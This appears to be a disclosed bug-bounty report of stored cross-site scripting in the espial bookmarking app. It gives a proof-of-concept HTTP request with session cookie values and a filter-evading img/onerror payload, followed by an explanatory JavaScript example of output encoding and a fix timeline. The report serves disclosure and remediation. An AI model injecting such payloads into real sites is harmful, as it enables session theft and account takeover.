Cross-site Scripting (XSS) - Stored in jonschoning/espial

Valid

Reported on Sep 25th 2021

Description

Stored XSS in the description parameter when adding a URL (POST /api/add). The stored value is later rendered without output encoding, so the injected markup executes in the browser of any user who views the bookmark.

Proof of Concept

// PoC.request
POST /api/add HTTP/2
Host: esp.ae8.org
Cookie: _SESSION=Uf2kSChpmNkGUz1kytqnHN9zhOVX2jch7SXQn9NV7uMEcBBDttJFI4tFqtSQKbzuXneKQS6YglelqqyoxkQcFsQXU1q+VBO0PGt8xdVJj6iGur8g7LDLRBXiNgKGax30ZNZuXRpnznXjKjxbzpaXyyk7lXHV/aax+aRwUkzHQeUz0A1m88DG6OS9XPWf50serdJ8dSDjV2s6AzrLsAL2FoJfStU0JhBIbAwN+Q2mdjbGSflh8v5Qd0Mt3aerjVl84zsctWmV5tIgZHeyk9AYsyD+CLaABiNW7ZSU2xrJF+2GVcWot3tO+nvY4XHotRFFzQR8Vp6+BeJNkWY=; XSRF-TOKEN=rK2UKn5OcYHo0nsPw8jOP5YR99BDb84wsCXxyaQ0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Xsrf-Token: rK2UKn5OcYHo0nsPw8jOP5YR99BDb84wsCXxyaQ0
Content-Type: application/json
Content-Length: 246
Origin: https://esp.ae8.org
Referer: https://esp.ae8.org/add?next=https%3A%2F%2Fesp.ae8.org%2Fu%3Ademo
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers

{"url":"http://google.com","toread":null,"title":"\"><iMg SrC=\"x\" oNeRRor=\"alert(1);\">","time":null,"tags":null,"slug":null,"selected":null,"private":false,"description":"\"><iMg SrC=\"x\" oNeRRor=\"alert(1);\">","bid":null,"archiveUrl":null}

Steps to Reproduce

Go to the add URL page (/add).

Enter the following payload in the description field and save: "><iMg SrC="x" oNeRRor="alert(1);">
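The root cause described above is a stored value being placed into markup without output encoding. The following is an added example, not espial's code and not the fix from commit 3ecb38: it shows the unsafe rendering pattern next to a hardened one, using the bookmark record and payload from this report as constructed input. The helper names (escapeHtml, safeHref, renderBookmarkUnsafe, renderBookmarkSafe, unexpectedTags) and the two-tag template are assumptions made for the example.

```javascript
// Added example (not espial's code). Demonstrates why the stored "description"
// and "title" fields need HTML entity encoding at output time, and gives a
// small check a test suite can run over rendered markup.

// Bookmark record constructed from the PoC body in the report above.
const bookmark = {
  url: "http://google.com",
  title: '"><iMg SrC="x" oNeRRor="alert(1);">',
  description: '"><iMg SrC="x" oNeRRor="alert(1);">',
};

// Entity-encode the five characters that can change HTML structure. Safe for
// element content and for double-quoted attribute values.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Entity encoding alone does not make a value safe as an href: a stored
// "javascript:" URL would still run on click. Allow only http(s) schemes.
function safeHref(url) {
  return /^https?:\/\//i.test(String(url)) ? String(url) : "#";
}

// Vulnerable pattern (hypothetical): stored user input is concatenated straight
// into markup. The leading quote in the payload closes the title attribute and
// the <img onerror> that follows becomes live markup.
function renderBookmarkUnsafe(b) {
  return `<a href="${b.url}" title="${b.title}">${b.title}</a>` +
         `<p class="description">${b.description}</p>`;
}

// Hardened pattern: every untrusted value is encoded for the context it lands
// in (attribute value or element content) and the href scheme is validated.
function renderBookmarkSafe(b) {
  const title = escapeHtml(b.title);
  return `<a href="${escapeHtml(safeHref(b.url))}" title="${title}">${title}</a>` +
         `<p class="description">${escapeHtml(b.description)}</p>`;
}

// Regression check for a test suite: list tag names in the rendered markup
// that the template never emits. Scans tag names only, so it is not fooled by
// an encoded "oNeRRor=" that survives as inert text inside a quoted attribute.
// Case-insensitive because the report's payload uses mixed case (iMg / oNeRRor)
// to slip past naive lowercase filters.
function unexpectedTags(html, allowed = ["a", "p"]) {
  const seen = new Set();
  for (const m of html.matchAll(/<\/?\s*([a-z][a-z0-9]*)/gi)) {
    seen.add(m[1].toLowerCase());
  }
  return [...seen].filter((tag) => !allowed.includes(tag));
}

console.log("unsafe render injects:", unexpectedTags(renderBookmarkUnsafe(bookmark)));
console.log("safe render injects:  ", unexpectedTags(renderBookmarkSafe(bookmark)));
```

The encoding has to happen at render time in the context where the value is used; rejecting or stripping characters at /api/add is brittle (the mixed-case payload above is one reason) and breaks legitimate descriptions that contain angle brackets. A Content-Security-Policy that disallows inline event handlers is a useful second layer but does not replace output encoding.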

Impact

This vulnerability could allow an attacker to steal a user's session cookie and gain unauthorized access to that user's account, since the payload runs in the browser of every user who views the stored bookmark.

Timeline

We created a GitHub Issue asking the maintainers to create a SECURITY.md (a year ago)
We have contacted a member of the jonschoning/espial team and are waiting to hear back (a year ago)
lethanhphuc modified the report (a year ago)
Jon Schoning validated this vulnerability (a year ago)
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jon Schoning confirmed that a fix has been merged on 3ecb38 (a year ago)
Jon Schoning has been awarded the fix bounty